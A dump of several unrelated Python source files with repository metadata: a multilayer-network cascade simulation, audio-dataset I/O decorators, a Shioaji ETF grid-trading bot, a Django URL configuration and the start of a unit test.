                net[cur_node, target_node, cur_layer_name, cur_layer_name] = 1
                intra_rand_edges.append((cur_node, target_node, cur_layer_name))
                edges += 1
    elif (intra_type == 'Random') and (inter_type == 'Random'):
        for cur_node, target_node, cur_layer_name in intra_rand_edges:
            net[cur_node, target_node, cur_layer_name, cur_layer_name] = 1
    return net
def make_edges(net, layer_names, intra_type, inter_type):
    """Populate intra- and inter-layer edges for every layer of the network."""
    for idx in range(layers):
        net = make_intralayer_edges(net, idx, layer_names[idx], intra_type, inter_type)
        net = make_interlayer_edges(net, idx, layer_names, intra_type, inter_type)
    return net
def find_supporting_nodes(layer_names, intra_type, inter_type):
    """Choose, for every node, the nodes in a neighbouring layer that support it.

    RGG builds pick geometric neighbours within `inter_thres`; Random builds
    pick random targets but preserve the per-node support counts of the RGG
    build. Results go into the rgg_*/rand_* global dictionaries.
    """
    if (intra_type == 'RGG') and (inter_type == 'RGG'):
        for cur_layer in range(len(layer_names)):
            target_nodes = []
            # Edge layers can only be supported by their single neighbour layer;
            # middle layers choose per support_type.
            if cur_layer == 0:
                target_nodes = list(range(((cur_layer + 1) * nodes), ((cur_layer + 2) * nodes)))
            elif cur_layer == len(layer_names) - 1:
                target_nodes = list(range(((cur_layer - 1) * nodes), cur_layer * nodes))
            else:
                if support_type == "random_nodes":
                    target_nodes = list(range(((cur_layer + 1) * nodes), ((cur_layer + 2) * nodes)))
                elif support_type == "random_layers":
                    choice = random.choice([(cur_layer - 1), (cur_layer + 1)])
                    target_nodes = list(range((choice * nodes), ((choice + 1) * nodes)))
            for cur_node in range(cur_layer * nodes, (cur_layer + 1) * nodes):
                temp_supp = []
                for target_node in target_nodes:
                    cur_dist = cal_dist(cur_node, target_node)
                    if cur_dist <= inter_thres:
                        temp_supp.append(target_node)
                rgg_rgg_supp_nodes[cur_node] = temp_supp
    elif (intra_type == 'Random') and (inter_type == 'RGG'):
        # Same geometric supports as the RGG/RGG build.
        for cur_node in rgg_rgg_supp_nodes:
            rand_rgg_supp_nodes[cur_node] = rgg_rgg_supp_nodes[cur_node]
    elif (intra_type == 'RGG') and (inter_type == 'Random'):
        for cur_layer in range(len(layer_names)):
            target_nodes = []
            if cur_layer == 0:
                target_nodes = list(range(((cur_layer + 1) * nodes), ((cur_layer + 2) * nodes)))
            elif cur_layer == len(layer_names) - 1:
                target_nodes = list(range(((cur_layer - 1) * nodes), cur_layer * nodes))
            else:
                if support_type == "random_nodes":
                    target_nodes = list(range(((cur_layer + 1) * nodes), ((cur_layer + 2) * nodes)))
                elif support_type == "random_layers":
                    # Reuse the layer the RGG build supported: a zero
                    # back-support count means it picked the layer below.
                    if inter_edges_num[cur_layer][3] == 0:
                        choice = cur_layer - 1
                    else:
                        choice = cur_layer + 1
                    target_nodes = list(range((choice * nodes), ((choice + 1) * nodes)))
            random.shuffle(target_nodes)
            cur_layer_nodes = list(range((cur_layer * nodes), ((cur_layer + 1) * nodes)))
            random.shuffle(cur_layer_nodes)
            index = 0
            # Give each node as many random supporters as node `index` had
            # in the RGG build, preserving the support-count distribution.
            for cur_node in cur_layer_nodes:
                temp_supp = []
                cur_supp = len(rgg_rgg_supp_nodes[index])
                for i in range(cur_supp):
                    temp_supp.append(target_nodes[i])
                random.shuffle(target_nodes)
                rgg_rand_supp_nodes[cur_node] = temp_supp
                index += 1
    elif (intra_type == 'Random') and (inter_type == 'Random'):
        for cur_node in rgg_rand_supp_nodes:
            rand_rand_supp_nodes[cur_node] = rgg_rand_supp_nodes[cur_node]
def make_nodes(net, layer_names, intra_type, inter_type):
    """Add `nodes` nodes to each layer.

    Fresh coordinates are drawn only for the RGG/RGG build; the other
    builds reuse the coordinates already stored in the global `coords`.
    """
    draw_coords = (intra_type == 'RGG') and (inter_type == 'RGG')
    for layer_idx in range(layers):
        for offset in range(nodes):
            node_id = layer_idx * nodes + offset
            if draw_coords:
                coords[node_id] = (random.random(), random.random())
            net.add_node(node_id, layer_names[layer_idx])
    return net
def make_network_layer(net, layer_names):
    """Create one single-aspect layer per level, named 'a', 'b', 'c', ...

    Mutates `layer_names` in place and returns it alongside the network.
    """
    for name in (chr(ord('a') + i) for i in range(layers)):
        net.add_layer(name, aspect=0)
        layer_names.append(name)
    return net, layer_names
def build_network(intra_type, inter_type):
    """Assemble a multilayer network with the requested intra/inter edge types."""
    names = []
    network = MultilayerNetwork(aspects=1, fullyInterconnected=False, directed=False)
    network, names = make_network_layer(network, names)
    network = make_nodes(network, names, intra_type, inter_type)
    find_supporting_nodes(names, intra_type, inter_type)
    return make_edges(network, names, intra_type, inter_type)
def analyse_initial_network(net):
    """Print per-layer statistics (clustering, mean degree, components) of `net`."""
    layer_names = net.get_layers() # return dictionary
    layer_names = sorted(list(layer_names))
    stats = { "clustering":[], # Average clustering coefficient
              "mean degree":[], # Mean degree
              "components":[], # Components of the graph in each layers
              "largest component":[], # The largest component of the graphs
              "size of largest component":[], # The size of the largest component
            }
    cur_layer = 0
    for layer in layer_names:
        # Collect this layer's intra-layer edges into a plain edge list.
        edges = []
        for i in range((cur_layer * nodes), ((cur_layer + 1) * nodes)):
            for j in range((cur_layer * nodes), ((cur_layer + 1) * nodes)):
                if (i != j) & (net[i, j, layer, layer] == 1):
                    edges.append((i, j))
        """
        for edge in net.edges:
            if edge[2] == edge[3] == layer:
                edges.append(edge[:1])
        """
        # Analyse the layer as an ordinary networkx graph.
        G = nx.Graph()
        G.add_edges_from(edges)
        components = []
        for sub_G in nx.connected_components(G):
            components.append(sub_G)
        stats["clustering"].append(nx.average_clustering(G))
        # Each undirected edge was collected twice (i->j and j->i).
        stats["mean degree"].append(len(edges) * 2 / nodes)
        stats["components"].append(components)
        stats["largest component"].append(max(components, key=len))
        stats["size of largest component"].append(len(max(components, key=len)))
        cur_layer +=1
    keyList = stats.keys()
    for key in keyList:
        print("Key:%s\t"%key)
        print(stats[key])
def analyse_attacked_network(net):
    """Unfinished stub: builds the stats scaffold for a post-attack analysis
    but never fills or returns it (mirrors analyse_initial_network)."""
    layer_names = net.get_layers()
    layer_names = sorted(list(layer_names))
    stats = { "clustering":[], # Average clustering coefficient
             "mean degree":[], # Mean degree
             "components":[], # Components of the graph in each layers
             "largest component":[], # The largest component of the graphs
             "size of largest component":[], # The size of the largest component
             }
def draw_network(net, type):
    """Render the multilayer network with pymnet and save it as a PDF.

    NOTE(review): the parameter `type` shadows the builtin; kept for
    caller compatibility. It is used only in the output filename.
    """
    fig = draw(net, nodeCoords=coords, nodeLabelRule={}, nodeSizeRule={'rule':'scaled', 'scalecoeff': 0.01}, defaultEdgeWidth=0.5, show=False)
    fig.savefig("%s Network.pdf" % type)
if __name__ == "__main__":
    # Build all four network variants, then run the chosen attack on each.
    start = time.time()
    rgg_rgg_net = build_network(intra_type='RGG', inter_type='RGG')
    # analyse_initial_network(rgg_rgg_net)
    # draw_network(rgg_rgg_net, type="intra_RGG, inter_RGG")
    print("1st: Done")
    rgg_rand_net = build_network(intra_type='RGG', inter_type='Random')
    # analyse_initial_network(rgg_rand_net)
    # draw_network(rgg_rand_net, type="intra_RGG, inter_Random")
    print("2nd: Done")
    rand_rgg_net= build_network(intra_type='Random', inter_type='RGG')
    # analyse_initial_network(rand_rgg_net)
    # draw_network(rand_rgg_net, type="intra_Random, inter_RGG")
    print("3rd: Done")
    rand_rand_net = build_network(intra_type='Random', inter_type='Random')
    # analyse_initial_network(rand_rand_net)
    # draw_network(rand_rand_net, type="intra_Random, inter_Random")
    print("4th: Done")
    print("time: ", time.time() - start)
    """
    Types of attacks/cascades:
        1. normal attack: select nodes that will be initially attacked randomly.
        2. spatial_number attack: select the nearest (attack_number) nodes from the attack_point, and they will be initially attacked.
        3. spatial_range attack: nodes in the circle (centre: attack_point, radius: attack_radius) will be attacked initially.
    For "normal" attack, cas.attack_network(network, coords, supporting_nodes, attack_type, attack_size=20)
    For "spatial_number" attack, cas.attack_network(network, coords, supporting_nodes, attack_type, attack_size=20, attack_layer='a', attack_point=(0.5, 0.5))
    For "spatial_range" attack, cas.attack_network(network, coords, supporting_nodes, attack_type, attack_layer='a', attack_point=(0.5, 0.5), attack_radius=0.1)
    attack_size = 20 # number of nodes that will be initially killed
    attack_layer = 'a' # the target layer of the attack.
                         'a', 'b', 'c'... means the specific layer. 0 means that suppose every nodes are in the same layer.
    attack_point = (0.5, 0.5) # attack point for spatial_number and spatial_range attacks
    attack_radius = 0.1 # the radius of attack in spatial_range attacks
    """
    # Each variant is attacked with the same parameters; the commented
    # alternatives show the call shapes for the other attack types.
    # att_rgg_rgg_net = cas.attack_network(rgg_rgg_net, coords, rgg_rgg_supp_nodes, attack_type, graph_type="RGG_RGG", attack_size=20)
    att_rgg_rgg_net = cas.attack_network(rgg_rgg_net, coords, rgg_rgg_supp_nodes, attack_type, graph_type="RGG_RGG", attack_size=attack_size, attack_point=(0.5, 0.5))
    # att_rgg_rgg_net = cas.attack_network(rgg_rgg_net, coords, rgg_rgg_supp_nodes, attack_type, graph_type="RGG_RGG", attack_point=(0.5, 0.5), attack_radius=0.1)
    # analyse_attacked_network(attacked_network)
    # draw_network(attacked_network, type="Attacked RGG")
    # att_rgg_rand_net = cas.attack_network(rgg_rand_net, coords, rgg_rand_supp_nodes, attack_type, graph_type="RGG_Rand", attack_size=20)
    att_rgg_rand_net = cas.attack_network(rgg_rand_net, coords, rgg_rand_supp_nodes, attack_type, graph_type="RGG_Rand", attack_size=attack_size, attack_point=(0.5, 0.5))
    # att_rgg_rand_net = cas.attack_network(rgg_rand_net, coords, rgg_rand_supp_nodes, attack_type, graph_type="RGG_Rand", attack_point=(0.5, 0.5), attack_radius=0.1)
    # analyse_attacked_network(attacked_rand_network)
    # draw_network(attacked_rand_network, type="Attacked Random")
    # att_rand_rgg_net = cas.attack_network(rand_rgg_net, coords, rand_rgg_supp_nodes, attack_type, graph_type="Rand_RGG", attack_size=20)
    att_rand_rgg_net = cas.attack_network(rand_rgg_net, coords, rand_rgg_supp_nodes, attack_type, graph_type="Rand_RGG", attack_size=attack_size, attack_point=(0.5, 0.5))
    # att_rand_rgg_net = cas.attack_network(rand_rgg_net, coords, rand_rgg_supp_nodes, attack_type, graph_type="Rand_RGG", attack_point=(0.5, 0.5), attack_radius=0.1)
    # analyse_attacked_network(attacked_rand_network)
    # draw_network(attacked_rand_network, type="Attacked Random")
    # att_rand_rand_net = cas.attack_network(rand_rand_net, coords, rand_rand_supp_nodes, attack_type, graph_type="Rand_Rand", attack_size=20)
    att_rand_rand_net = cas.attack_network(rand_rand_net, coords, rand_rand_supp_nodes, attack_type, graph_type="Rand_Rand", attack_size=attack_size, attack_point=(0.5, 0.5))
    # att_rand_rand_net = cas.attack_network(rand_rand_net, coords, rand_rand_supp_nodes, attack_type, graph_type="Rand_Rand", attack_point=(0.5, 0.5), attack_radius=0.1)
    # analyse_attacked_network(attacked_rand_network)
    # draw_network(att_rgg_rgg_net, type="Attacked intra_RGG, inter_RGG")
    # draw_network(att_rgg_rand_net, type="Attacked intra_RGG, inter_Rand")
    # draw_network(att_rand_rgg_net, type="Attacked intra_Rand, inter_RGG")
    # draw_network(att_rand_rand_net, type="Attacked intra_Rand, inter_Rand")
    print("time: ", time.time() - start)
| [
"junohpark221@gmail.com"
] | junohpark221@gmail.com |
f6de8840feaa6b8b1a09493b169925ace0eaa131 | b129e8fed37768c3af97735c1cb088d05315cf1c | /soundata/io.py | b367b8209335e973182e3cca226cbaedbb0736b7 | [
"BSD-3-Clause"
] | permissive | soundata/soundata | 85c940c84a606bc33ee677602d4987ab91e5fe6c | 6c91c626cc08030458829371ae804e36ac130552 | refs/heads/main | 2023-08-22T16:07:30.010405 | 2023-04-28T17:40:13 | 2023-04-28T17:40:13 | 343,599,660 | 233 | 19 | BSD-3-Clause | 2023-08-04T21:45:49 | 2021-03-02T00:42:25 | Python | UTF-8 | Python | false | false | 1,602 | py | import functools
import io
from typing import BinaryIO, Callable, Optional, TextIO, TypeVar, Union
T = TypeVar("T") # Can be anything
def coerce_to_string_io(
    func: "Callable[[TextIO], T]"
) -> "Callable[[Optional[Union[str, TextIO]]], Optional[T]]":
    """Decorator: let *func*, which expects an open text stream, also accept
    a file path (opened for reading) or a falsy value (returns ``None``).

    Raises:
        ValueError: if the argument is neither a str path, an
            ``io.StringIO``, nor falsy.
    """

    @functools.wraps(func)
    def wrapper(file_path_or_obj: "Optional[Union[str, TextIO]]") -> "Optional[T]":
        if not file_path_or_obj:
            return None
        if isinstance(file_path_or_obj, str):
            with open(file_path_or_obj) as f:
                return func(f)
        elif isinstance(file_path_or_obj, io.StringIO):
            # NOTE(review): only StringIO is accepted here -- real text file
            # objects (TextIOWrapper) are rejected; confirm this is intended.
            return func(file_path_or_obj)
        else:
            # Bug fix: the placeholders were never interpolated -- ValueError
            # used to receive the template and the values as separate args.
            raise ValueError(
                "Invalid argument passed to {}, argument has the type {}".format(
                    func.__name__, type(file_path_or_obj)
                )
            )

    return wrapper
def coerce_to_bytes_io(
    func: "Callable[[BinaryIO], T]"
) -> "Callable[[Optional[Union[str, BinaryIO]]], Optional[T]]":
    """Decorator: let *func*, which expects an open binary stream, also accept
    a file path (opened in binary mode) or a falsy value (returns ``None``).

    Raises:
        ValueError: if the argument is neither a str path, an
            ``io.BytesIO``, nor falsy.
    """

    @functools.wraps(func)
    def wrapper(file_path_or_obj: "Optional[Union[str, BinaryIO]]") -> "Optional[T]":
        if not file_path_or_obj:
            return None
        if isinstance(file_path_or_obj, str):
            with open(file_path_or_obj, "rb") as f:
                return func(f)
        elif isinstance(file_path_or_obj, io.BytesIO):
            # NOTE(review): only BytesIO is accepted here -- real binary file
            # objects (BufferedReader) are rejected; confirm this is intended.
            return func(file_path_or_obj)
        else:
            # Bug fix: the placeholders were never interpolated -- ValueError
            # used to receive the template and the values as separate args.
            raise ValueError(
                "Invalid argument passed to {}, argument has the type {}".format(
                    func.__name__, type(file_path_or_obj)
                )
            )

    return wrapper
| [
"noreply@github.com"
] | soundata.noreply@github.com |
317b01f512f5c33b18535d05ccdea940bf6cf130 | 686a59755d46e60fe3ebf8779253f7dc97a0b67a | /Ithome30days/Gridbot.py | deb99254d288d50e5d2df3fe0eed4e73db56c16c | [] | no_license | Lnanhung14/ithome_ironman2021 | 5b49bd1dec52fcb19f11611c86911952dae6fd27 | 3af8bd4f73c8945b2ef79052884493e679c89e11 | refs/heads/master | 2023-08-28T23:56:02.080752 | 2021-10-03T09:30:58 | 2021-10-03T09:30:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,194 | py | from shioaji.data import Kbars
import pandas as pd
import shioaji
import matplotlib.pyplot as plt
import yfinance as yf
import numpy as np
import ShiojiLogin
api=ShiojiLogin.api
import datetime
class GridBot:
upperid='006208'
lowerid='00646'
upperprice=0
uppershare=0
lowerprice=0
lowershare=0
uppershareTarget=0
lowershareTarget=0
MA=0
money=0
parameters={'BiasUpperLimit':1.1,\
'UpperLimitPosition':0.1,\
'BiasLowerLimit':0.9,\
'LowerLimitPosition':0.9,\
'BiasPeriod':50}
year=0
month=0
day=0
    def __init__(self,uppershare=0,lowershare=0,money=10000):
        """Seed the bot with starting positions and cash and resolve contracts."""
        self.money=money
        self.uppershare=uppershare
        self.lowershare=lowershare
        # Resolve Shioaji contract objects for both legs once up front.
        self.contractUpper = api.Contracts.Stocks[self.upperid]
        self.contractLower = api.Contracts.Stocks[self.lowerid]
    def cancelOrders(self):
        """Cancel every open (submitted or partially filled) order on both legs."""
        api.update_status()
        tradelist=api.list_trades()
        tradeUpper=[]
        tradeLower=[]
        for i in range(0,len(tradelist),1):
            thistrade=tradelist[i]
            # Only still-active orders can be cancelled.
            cond1=str(thistrade.status.status)=='Status.Submitted'\
                or str(thistrade.status.status)=='Status.PartFilled'
            cond2=thistrade.contract.code==self.upperid
            cond3=thistrade.contract.code==self.lowerid
            cond4=self.lowerid!='Cash'
            if(cond1 and cond2):
                tradeUpper.append(thistrade)
            if(cond1 and cond3 and cond4):
                tradeLower.append(thistrade)
        for i in range(0,len(tradeUpper),1):
            api.cancel_order(trade=tradeUpper[i])
        # The lower leg only exists when it is a real ticker, not 'Cash'.
        if(self.lowerid!='Cash'):
            for i in range(0,len(tradeLower),1):
                api.cancel_order(trade=tradeLower[i])
    def getPositions(self):
        """Refresh self.uppershare / self.lowershare from the broker's positions."""
        portfolio=api.list_positions(unit=shioaji.constant.Unit.Share)
        df_positions = pd.DataFrame(portfolio)
        quantity=df_positions.loc[df_positions['code'] == self.upperid]['quantity']
        # Empty selection means no position held in that ticker.
        if(quantity.size==0):
            self.uppershare=0
        else:
            self.uppershare=int(quantity)
        if(self.lowerid!='Cash'):
            quantity=df_positions.loc[df_positions['code'] == self.lowerid]['quantity']
            if(quantity.size==0):
                self.lowershare=0
            else:
                self.lowershare=int(quantity)
    def sendOrders(self):
        """Place intraday odd-lot orders to move holdings toward the targets.

        NOTE(review): stockBid / stockAsk / stockPrice are module globals not
        defined in this file -- presumably populated by a quote callback;
        confirm before relying on this method. The local `money` bookkeeping
        is never written back to self.money.
        """
        quantityUpper=self.uppershareTarget-self.uppershare
        quantityLower=self.lowershareTarget-self.lowershare
        code=self.upperid
        money=self.money
        # Build a buy or sell order for the upper leg depending on the gap sign.
        if(quantityUpper>0):
            order = api.Order(
                price=stockBid[code],
                quantity=quantityUpper,
                action=shioaji.constant.Action.Buy,
                price_type=shioaji.constant.StockPriceType.LMT,
                order_type=shioaji.constant.TFTOrderType.ROD,
                order_lot=shioaji.constant.TFTStockOrderLot.IntradayOdd,
                account=api.stock_account,
            )
            print(code,' buy:')
            print('quantity:',quantityUpper)
            print('price:',stockBid[code])
        else:
            order = api.Order(
                price=stockAsk[code],
                quantity=abs(quantityUpper),
                action=shioaji.constant.Action.Sell,
                price_type=shioaji.constant.StockPriceType.LMT,
                order_type=shioaji.constant.TFTOrderType.ROD,
                order_lot=shioaji.constant.TFTStockOrderLot.IntradayOdd,
                account=api.stock_account,
            )
            print(code,' sell:')
            print('quantity:',abs(quantityUpper))
            print('price:',stockAsk[code])
        # Only submit when the order value is at least 2000 (minimum trade size).
        if(abs(quantityUpper)*stockPrice[code]>=2000):
            contract = api.Contracts.Stocks[code]
            cost=stockBid[code]*quantityUpper
            if(quantityUpper>0):
                # Buys require enough remaining cash.
                if(money>cost):
                    money=money-cost
                    trade = api.place_order(contract, order)
            else:
                trade = api.place_order(contract, order)
        # Repeat the same procedure for the lower leg, unless it is cash.
        if(self.lowerid!='Cash'):
            code=self.lowerid
            if(quantityLower>0):
                order = api.Order(
                    price=stockBid[code],
                    quantity=quantityLower,
                    action=shioaji.constant.Action.Buy,
                    price_type=shioaji.constant.StockPriceType.LMT,
                    order_type=shioaji.constant.TFTOrderType.ROD,
                    order_lot=shioaji.constant.TFTStockOrderLot.IntradayOdd,
                    account=api.stock_account,
                )
                print(code,' buy:')
                print('quantity:',quantityLower)
                print('price:',stockBid[code])
            else:
                order = api.Order(
                    price=stockAsk[code],
                    quantity=-quantityLower,
                    action=shioaji.constant.Action.Sell,
                    price_type=shioaji.constant.StockPriceType.LMT,
                    order_type=shioaji.constant.TFTOrderType.ROD,
                    order_lot=shioaji.constant.TFTStockOrderLot.IntradayOdd,
                    account=api.stock_account,
                )
                print(code,' sell:')
                print('quantity:',abs(quantityLower))
                print('price:',stockAsk[code])
            if(abs(quantityLower)*stockPrice[code]>=2000):
                contract = api.Contracts.Stocks[code]
                cost=stockBid[code]*quantityLower
                if(quantityLower>0):
                    if(money>cost):
                        money=money-cost
                        trade = api.place_order(contract, order)
                else:
                    trade = api.place_order(contract, order)
def updateOrder(self):
    """Cancel, refresh and re-send the bot's grid orders.

    Skips the update during the last 30 s of every 3rd minute and the first
    30 s of the following minute (presumably to avoid racing the periodic
    per-minute rebalance job -- TODO confirm).
    """
    now = datetime.datetime.now()
    minute=now.minute
    second=now.second
    if(minute%3==0 and second>=30):
        return
    if(minute%3==1 and second<=30):
        return
    #1.delete orders
    self.cancelOrders()
    #2.update positions
    self.getPositions()
    #3.create orders
    self.sendOrders()
def calculateSharetarget(self,upperprice,lowerprice):
    """Recompute the target share counts for the upper/lower legs from the current bias.

    Any change in the brokerage cash balance since the last call is first
    credited to this bot's working capital (via the module-global accountCash).
    """
    global accountCash
    currentcash=getCash()
    # Credit/debit external cash movements to the bot's bankroll.
    self.money+=currentcash-accountCash
    accountCash=currentcash
    MA=self.MA
    uppershare=self.uppershare
    lowershare=self.lowershare
    money=self.money
    # Total capital managed by this bot: cash plus both legs marked at the
    # supplied prices.
    capitalInBot=money+uppershare*upperprice+lowershare*lowerprice
    # Compute the target position as a fraction of capital.
    # print('MA:',MA)
    # print('upperprice:',upperprice)
    # print('lowerprice:',lowerprice)
    # Bias: current upper/lower price ratio relative to its moving average.
    Bias=(upperprice/lowerprice)/MA
    # print('Bias:',Bias)
    BiasUpperLimit=self.parameters['BiasUpperLimit']
    UpperLimitPosition=self.parameters['UpperLimitPosition']
    BiasLowerLimit=self.parameters['BiasLowerLimit']
    LowerLimitPosition=self.parameters['LowerLimitPosition']
    BiasPeriod=self.parameters['BiasPeriod']  # NOTE(review): unused in this method
    # Linearly interpolate the position fraction between the two limits.
    shareTarget=(Bias-BiasLowerLimit)/(BiasUpperLimit-BiasLowerLimit)
    shareTarget=shareTarget*(UpperLimitPosition-LowerLimitPosition)+LowerLimitPosition
    # NOTE(review): this pair only behaves as a clamp if
    # UpperLimitPosition <= LowerLimitPosition (i.e. the fraction held at the
    # upper bias limit is the SMALLER one); otherwise the result is always
    # pinned to LowerLimitPosition -- confirm the parameter convention.
    shareTarget=max(shareTarget,UpperLimitPosition)
    shareTarget=min(shareTarget,LowerLimitPosition)
    # print('shareTarget:',shareTarget)
    #print("shareTarget:",shareTarget)
    # Convert the target fraction into whole-share targets for each leg.
    self.uppershareTarget=int(shareTarget*capitalInBot/upperprice)
    self.lowershareTarget=int((1.0-shareTarget)*capitalInBot/lowerprice)
    self.upperprice=upperprice
    self.lowerprice=lowerprice
def UpdateMA(self):
    """Refresh the moving average of the upper/lower close ratio once per calendar day.

    Downloads 3 months of daily closes via yfinance, recomputes the
    `BiasPeriod`-day moving average (excluding today's partial bar), then
    records today's date so the download is not repeated until the date changes.
    """
    now = datetime.datetime.now()
    # Bug fix: the original condition used `and`, which only fired when year,
    # month AND day all differed simultaneously (i.e. almost never) -- a
    # De Morgan slip.  `or` is the correct negation of "same date".
    if(now.year!=self.year or now.month!=self.month or now.day!=self.day):
        print('reading upper')
        upper = yf.Ticker(self.upperid+".tw")
        upper_hist = upper.history(period="3mo")
        period=self.parameters['BiasPeriod']
        upper_close=upper_hist['Close']
        if(self.lowerid!='Cash'):
            print('reading lower')
            lower = yf.Ticker(self.lowerid+".tw")
            lower_hist = lower.history(period="3mo")
            lower_close=lower_hist['Close']
            # MA of the price RATIO when both legs are stocks.
            close=(upper_close/lower_close).dropna()
            self.MA=close[-(period+1):-1].sum()/period
        else:
            # Lower leg is cash: MA of the upper leg's close alone.
            close=upper_close.dropna()
            self.MA=close[-(period+1):-1].sum()/period
        # Remember the refresh date to throttle to once per day.
        self.year=now.year
        self.month=now.month
        self.day=now.day
def getCash():
    """Return total available cash: bank balance plus pending T+1/T+2 settlement money."""
    # Settlement money still in transit for unsettled trades.
    pending = pd.DataFrame(api.list_settlements(api.stock_account))
    settlement_cash = float(pending['t1_money']) + float(pending['t2_money'])
    # Current bank account balance.
    balance = pd.DataFrame(api.account_balance())
    return float(balance['acc_balance']) + settlement_cash
accountCash=getCash()
bot1=GridBot(uppershare=0,lowershare=0,money=10000)
import threading, time
from threading import Thread, Lock
mutexDict ={'006208':Lock(),'00646':Lock()}
mutexBidAskDict ={'006208':Lock(),'00646':Lock()}
subscribeStockList=['006208','00646']
snapshots={}
snapshots['006208'] = api.snapshots([api.Contracts.Stocks['006208']])
snapshots['00646'] = api.snapshots([api.Contracts.Stocks['00646']])
#抓取創建BOT當下的價格當作預設值
stockPrice={'006208':snapshots['006208'][0]['close'],\
'00646' :snapshots['00646'][0]['close']}
stockBid={'006208':snapshots['006208'][0]['close'],\
'00646' :snapshots['00646'][0]['close']}
stockAsk={'006208':snapshots['006208'][0]['close'],\
'00646' :snapshots['00646'][0]['close']}
def jobs_per1min():
    """Background loop: once per minute refresh the MA, sanitize prices,
    recompute share targets and refresh the bot's resting orders."""
    while(1):
        bot1.UpdateMA()
        print('UpdateMA Done')
        #get price
        # Take all price/quote locks, then clamp each last-trade price into the
        # current bid/ask band (a stale trade outside the band is replaced by
        # the mid price).
        mutexDict['006208'].acquire()
        mutexDict['00646'].acquire()
        mutexBidAskDict['006208'].acquire()
        mutexBidAskDict['00646'].acquire()
        if(stockPrice['006208']>stockAsk['006208'] or stockPrice['006208']<stockBid['006208']):
            stockPrice['006208']=(stockAsk['006208']+stockBid['006208'])/2
        if(stockPrice['00646']>stockAsk['00646'] or stockPrice['00646']<stockBid['00646']):
            stockPrice['00646']=(stockAsk['00646']+stockBid['00646'])/2
        mutexDict['00646'].release()
        mutexDict['006208'].release()
        mutexBidAskDict['00646'].release()
        mutexBidAskDict['006208'].release()
        #update share target
        bot1.calculateSharetarget(upperprice=stockPrice['006208']\
            ,lowerprice=stockPrice['00646'])
        current_time = time.time()
        #update orders
        bot1.updateOrder()
        # Sleep until the next whole-minute boundary.
        cooldown=60
        time_to_sleep = cooldown - (current_time % cooldown)
        time.sleep(time_to_sleep)
thread = threading.Thread(target=jobs_per1min)
thread.start()
contract_006208 = api.Contracts.Stocks["006208"]
contract_00646 = api.Contracts.Stocks["00646"]
tick_006208=api.quote.subscribe(\
contract_006208,\
quote_type = shioaji.constant.QuoteType.Tick,\
version = shioaji.constant.QuoteVersion.v1,\
intraday_odd = True
)
bidask006208=api.quote.subscribe(\
contract_006208,\
quote_type = shioaji.constant.QuoteType.BidAsk,\
version = shioaji.constant.QuoteVersion.v1,\
intraday_odd=True
)
tick_00646=api.quote.subscribe(\
contract_00646,\
quote_type = shioaji.constant.QuoteType.Tick,\
version = shioaji.constant.QuoteVersion.v1,\
intraday_odd = True
)
bidask00646=api.quote.subscribe(\
contract_00646,\
quote_type = shioaji.constant.QuoteType.BidAsk,\
version = shioaji.constant.QuoteVersion.v1,\
intraday_odd=True
)
from shioaji import BidAskSTKv1, Exchange,TickSTKv1
@api.on_tick_stk_v1()
def STKtick_callback(exchange: Exchange, tick:TickSTKv1):
    """Tick stream handler: record the latest trade price under the per-stock lock."""
    code=tick['code']
    mutexDict[code].acquire()
    stockPrice[code]=float(tick['close'])
    mutexDict[code].release()
    #print(f"Exchange: {exchange}, Tick: {tick}")
api.quote.set_on_tick_stk_v1_callback(STKtick_callback)
@api.on_bidask_stk_v1()
def STK_BidAsk_callback(exchange: Exchange, bidask:BidAskSTKv1):
    """Quote stream handler: record best bid/ask under the per-stock bid/ask lock."""
    code=bidask['code']
    mutexBidAskDict[code].acquire()
    stockBid[code]=float(bidask['bid_price'][0])
    stockAsk[code]=float(bidask['ask_price'][0])
    mutexBidAskDict[code].release()
    #print(f"Exchange: {exchange}, BidAsk: {bidask}")
api.quote.set_on_bidask_stk_v1_callback(STK_BidAsk_callback)
@api.quote.on_event
def event_callback(resp_code: int, event_code: int, info: str, event: str):
    """Log quote-session events (connect/disconnect etc.) to stdout."""
    print(f'Event code: {event_code} | Event: {event}')
api.quote.set_event_callback(event_callback)
| [
"aaa0025235@gmail.com"
] | aaa0025235@gmail.com |
52aee0fd09b24edae3d34ee70ae4d681a2aa67da | 3291359d8867e7b5ca9e8befb83629810938f903 | /timetable_v3/timetable_v3/urls.py | eb0c1bca0f82d83d2d60c6e88d1f7d126e417997 | [] | no_license | A-miin/timetable_v3 | f9e4610800acb83f3477dcffd2b0ce1c75d2c1d0 | 1de0885f04beec83657672275deff22b71af2de3 | refs/heads/master | 2023-06-09T18:51:44.298534 | 2021-07-02T15:01:54 | 2021-07-02T15:01:54 | 341,462,656 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,035 | py | """timetable_v3 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
import debug_toolbar
from webapp import urls
# URL routing table: admin site, the public webapp, role-specific sub-apps,
# and the django-debug-toolbar endpoint (development only).
urlpatterns = [
    path('admin/', admin.site.urls),
    path('', include('webapp.urls')),
    path('secretariat/', include('secretariat.urls', namespace='secretariat')),
    path('api/', include('api.urls', namespace='api')),
    path('__debug__/', include(debug_toolbar.urls)),
]
| [
"zulaykaisaeva@gmail.com"
] | zulaykaisaeva@gmail.com |
2ad7d7451c252323a7b922b7ce42a3e1f7a03c10 | 1ec29bec73904435980eedc26b3f1e07fafb8784 | /shmakovpn/tests/add_method_to_class/test_add_method_to_class.py | cbf04d3fd1befc3caed91a88242ef0ba4f9491ed | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | shmakovpn/shmakovpn_tools | 4f799c803f4ebdff0e82253ec161d5977e6036cb | 85090c9489b0b9fa13b6c42c91459efe9b966a3b | refs/heads/master | 2023-06-08T17:32:34.591391 | 2021-06-17T05:22:38 | 2021-06-17T05:22:38 | 284,875,102 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,118 | py | """
The simple example that explains the impossibility of adding a method to builtin type.
Author: shmakovpn <shmakovpn@yandex.ru>
Date: 2020-10-01
"""
import unittest
